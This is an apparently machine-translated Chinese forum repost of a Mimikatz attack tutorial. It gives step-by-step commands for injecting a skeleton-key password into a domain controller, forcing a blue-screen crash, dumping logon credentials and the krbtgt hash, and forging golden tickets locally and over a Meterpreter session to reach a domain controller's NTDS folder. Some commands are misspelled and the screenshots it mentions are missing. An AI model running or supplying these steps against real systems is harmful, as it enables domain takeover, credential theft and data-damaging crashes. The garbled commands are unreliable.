了解Mimikatz指南



什么是Mimikatz?

Mimikatz是Benjamin Delpy用C语言编写的工具。它是从内存中提取纯文本密码,哈希值和Kerberos票证的绝佳工具。它也可以用于生成黄金门票。
你可以从这里获得Mimikatz In ZIP 或者你可以从这里为git构建它
Mimikatz有两种架构:x32和x64。这是x64 mimikatz bash的屏幕截图。


使用Mimikatz生成Skeleton Key

受害者:Windows Server 2012 R2(域控制器)
攻击者:Mimikatz(在Windows Server 2012 R2上)
在这次攻击中,mimikatz在域控制器上安装补丁以接受“mimikatz”作为新的登录密码?它可以被视为主密钥,它将向攻击者打开Active Directory。可以如下所示执行此攻击。
首先,我将尝试使用mimikatz作为密码登录我的服务器。
正如您可以清楚地看到我们无法使用“mimikatz”作为密码登录服务器。
现在我将使用其密码“T00r”登录服务器。
如您所见,我使用正确的密码登录服务器
如果您曾登录过服务器或解锁了服务器,则可以使用Mimikatz创建一个存储在服务器内存中的框架密钥。
根据服务器的架构(x32,x64)启动Mimikartz终端。首先,我们将使用Mimikatz获得Debuging特权
命令:privilege :: debug
然后我们将使用mimikatz框架密钥注入服务器的内存中
命令:misc :: skeleton
有了这个,我们就可以在服务器上成功注入骨架键。
注意:您必须使用Administrative Privilege打开mimikatz才能创建Skeleton Key。
现在我将尝试使用我们刚刚在内存中注入的骨架键“mimikatz”登录服务器。记得上次我们尝试使用mimikatz作为密码登录服务器时,我们没有成功。
但这次'mimikatz'被接受为密码。这并不意味着我们重置了原始密码'T00r'。服务器将继续使用'T00r'登录,但现在它也将接受'mimikatz'作为密码。
现在,请记住我们在内存中注入了框架密钥,而不是在存储器中,因此下次管理员重新启动服务器时,我们将失去访问权限。因此,保护域控制器免受Skeleton Key保护的最佳方法是经常重启服务器或阻止mimikatz访问内存。


蓝色死亡屏幕(bsod)与Mimikatz

攻击者:Mimikatz(在Windows 7上)
受害者:Windows 7
我们可以使用mimikatz执行蓝屏死机或bsod攻击。这表明这个工具有多强大。要在系统上执行bsod,请按照以下步骤操作:
  • 使用管理员运行mimikatz
  • 启动mimidrv服务
命令:!+
现在按以下命令启动Bsod,如下所示。
命令:!bsod
如下所示,我们有蓝屏死机错误
注意:此攻击可能会破坏数据并可能损害系统。小心使用!!


显示主机名

您可以通过在mimikatz终端中键入hostname来提取受害者系统的主机名。
命令:主机名
我们已将系统的主机名解压缩为Pavan-pc


Mimikatz的金票奖

攻击者:Windows Server 2012 R2上的Mimikatz
受害者:Windows Server 2012 R2
要生成金票,我们需要以下信息:
  1. SID
  2. NTLM哈希
让我们先获得Domain。
要获取域,我们将从命令行或PowerShell 运行ipconfig / all
  • 我的服务器上的域是Pavan.local
  • 现在要获得SID,我们将使用whoami / user命令,如下图所示。
现在我们将mimikatz自己提取生成Ticket所需的ntml哈希。
首先,我们将使用下面给出的命令获得调试权限。
命令:privilege :: debug
现在要提取散列,我们将按照下面的命令运行。
命令:selurlsa :: logonpasswords
现在我们拥有生成票证所需的一切。
语法: kerbros :: golden / domain:[Domain] / sid:[SID] / rc4:[NTLM Hash] / user:[Username To Create] / id:500 / ptt
命令:kerbros :: golden /domain:PAVAN.LOCAL / sid:S-1-5-21-1118594253-693012904-2765600535 / rc4:9a7a6f22651d6a0fcc6e6a0c723c9cb0 / user:hacker / id:500 / ptt
在这里,我为名为“ hacker ” 的用户创建了金钥匙; 您可以使用域的任何现有用户或创建新用户。
我使用[/ ppt]选项在当前会话中传递票证。
现在运行命令提示符访问共享文件夹并执行以下命令:
pushd \\ WINSERVER01 \ c $
现在我们在Z:驱动程序执行以下命令用于NT目录服务
cd WINDOWS \ NTDS
DIR
正如您所看到的那样,我们可以访问共享文件夹,如果没有Admin Access就无法访问该文件夹,但我们已经获得了它而不使用CMD作为管理员。从下面给出的图像,您可以观察到它显示8个文件和2个文件夹。


远程生成金票

攻击者:卡利
受害者:Windows Server 2012 R2
首先获取服务器的Meterpreter访问权限,您可以从这里学习
获得meterpreter后,使用该命令将mimikatz文件夹上传到受害者系统
命令:upload -r / root / Desktop / mimi c:\
请记住使用-r以便递归上载命令。
打开shell并使用ipconfig / all解压缩Domain
和SID使用whoami / user
现在转到我们之前上传mimikatz的位置并运行mimikatz.exe,如下所示
现在让我们使用以下命令提取krbtgt NTLM哈希
命令:lsadump :: lsa / inject / name:krbtgt
现在使用提取的所有信息让我们以与上面相同的方式生成黄金票。
命令:kerberos :: golden /domain:pavan.loc / sid:S-1-5-21-97841242-3460736137-492355079 / rc4:e847d2e54044172830e3e3a6b8438853 / user:Hacker / id:500 / ptt
现在让我们访问共享文件夹,您可以看到我们可以访问共享文件夹,如果没有Admin Access,则无法访问该文件夹。
因此,我们通过Kali在Windows Server远程成功生成了一张黄金票
现在让我们访问共享文件夹,您可以看到我们可以访问共享文件夹,如果没有Admin Access,则无法访问该文件夹。
因此,我们通过Kali在Windows Server远程成功生成了一张黄金票


破解扫雷游戏

我们都玩过扫雷游戏,所有的地雷都很难,但那些担忧的日子已经结束了。为了表明Mimikatz是一个强大但有趣的工具,在这里我将使用Mimikatz破解扫雷游戏。
首先打开各自架构的Mimikatz。
然后打开扫雷游戏
通过使用在mimikatz中加载扫雷
命令:minesweeper :: infos
您可以在上面的屏幕截图中看到mimikarz shell中显示了扫雷网格。
现在点击Minsweeper上的任何Random块。
现在再次运行上一个命令,现在我们在网格上有我的位置。
您可以使用One with Mimikatz shell验证此图像。
转载请注明本文链接: http://www.mayidui.net/t2300.html
话题: 渗透
游客
登录后才可以回帖,登录 或者 注册